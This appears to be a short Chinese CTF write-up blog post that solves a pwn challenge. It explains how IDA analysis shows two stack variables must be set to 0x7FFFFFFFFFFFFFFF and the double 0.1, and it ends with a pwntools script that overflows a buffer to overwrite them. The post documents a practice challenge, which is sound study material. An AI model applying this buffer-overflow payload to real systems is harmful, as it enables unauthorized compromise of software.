题目:

链接:https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA
提取码:z5a7

 

首先找保护机制

难受 保护全开!!

 

运行一下,发现只有一个输入点。

 

 

ida分析一波

发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了解一下浮点型  0.1的值:

https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double?tdsourcetag=s_pctim_aiomsg 

 

或者用c跑一下

 

 

思路:填buf,直到覆盖v7和v8的值,达到成功修改。

 

from pwn import *


p = process(\'./pwn2\')

payload = \'\'
payload += \'A\'*24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A)

p.sendline(payload)
p.interactive()

 

比赛的时候脑子不是很好使,赛后不能再明明白白了。

 

版权声明:本文为z3ro原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/z3ro/p/9786742.html